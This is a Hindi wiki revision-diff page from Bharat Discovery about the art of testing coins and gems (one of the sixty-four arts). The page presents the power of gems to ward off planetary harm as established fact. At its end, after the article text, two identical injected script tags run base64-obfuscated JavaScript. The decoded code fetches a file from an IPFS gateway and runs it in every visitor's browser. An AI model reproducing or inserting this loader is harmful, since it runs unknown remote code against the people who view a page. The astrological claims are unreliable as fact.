Difference between revisions of "रूप्यरत्नपरीक्षा कला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replacement - "होनेवाले" to "होने वाले")
 
(5 intermediate revisions by 2 users not shown)
Line 1: Line 1:
[[चौंसठ कलाएँ जयमंगल के मतानुसार|जयमंगल के मतानुसार]] चौंसठ कलाओं में से यह एक कला है। सिक्के, रत्न आदि की परीक्षा करने की कला।
+
[[चौंसठ कलाएँ जयमंगल के मतानुसार|जयमंगल के मतानुसार]] चौंसठ कलाओं में से यह एक [[प्रांगण:कला|कला]] है। सिक्के, [[रत्न]] आदि की परीक्षा करने की कला।
रत्नों की पहचान और उनमें वेध (छिद्र) करने की क्रिया का ज्ञान 'कला' है। प्राचीन समय से ही अच्छे बुरे रत्नों की पहचान तथा उनके धारण से होनेवाले शुभाशुभ फल का ज्ञान यहाँ के लोगों को था। ग्रहों के अनिष्ट फलों को रोकने के लिये विभिन्न रत्नों को धारण करने का शास्त्रों ने उपदेश किया है। उसके अनुसार रत्नों को धारण करने का फल आज भी प्रत्यक्ष दिखलायी देता है। पर आज तो भारतवर्ष की यह स्थिति है कि अधिकांश लोगों को उन रत्नों का धारण करना तो दूर रहा, दर्शन भी दुर्लभ है।  
+
रत्नों की पहचान और उनमें वेध (छिद्र) करने की क्रिया का ज्ञान 'कला' है। प्राचीन समय से ही अच्छे बुरे रत्नों की पहचान तथा उनके धारण से होने वाले शुभाशुभ फल का ज्ञान यहाँ के लोगों को था। [[ग्रह|ग्रहों]] के अनिष्ट फलों को रोकने के लिये विभिन्न रत्नों को धारण करने का शास्त्रों ने उपदेश किया है। उसके अनुसार रत्नों को धारण करने का फल आज भी प्रत्यक्ष दिखलायी देता है। पर आज तो भारतवर्ष की यह स्थिति है कि अधिकांश लोगों को उन रत्नों का धारण करना तो दूर रहा, दर्शन भी दुर्लभ है।  
 +
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{चौंसठ कलाएँ जयमंगल}}
 
{{चौंसठ कलाएँ जयमंगल}}

Latest revision as of 13:46, 6 September 2017

jayamangal ke matanusar chauansath kalaoan mean se yah ek kala hai. sikke, ratn adi ki pariksha karane ki kala. ratnoan ki pahachan aur unamean vedh (chhidr) karane ki kriya ka jnan 'kala' hai. prachin samay se hi achchhe bure ratnoan ki pahachan tatha unake dharan se hone vale shubhashubh phal ka jnan yahaan ke logoan ko tha. grahoan ke anisht phaloan ko rokane ke liye vibhinn ratnoan ko dharan karane ka shastroan ne upadesh kiya hai. usake anusar ratnoan ko dharan karane ka phal aj bhi pratyaksh dikhalayi deta hai. par aj to bharatavarsh ki yah sthiti hai ki adhikaansh logoan ko un ratnoan ka dharan karana to door raha, darshan bhi durlabh hai.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>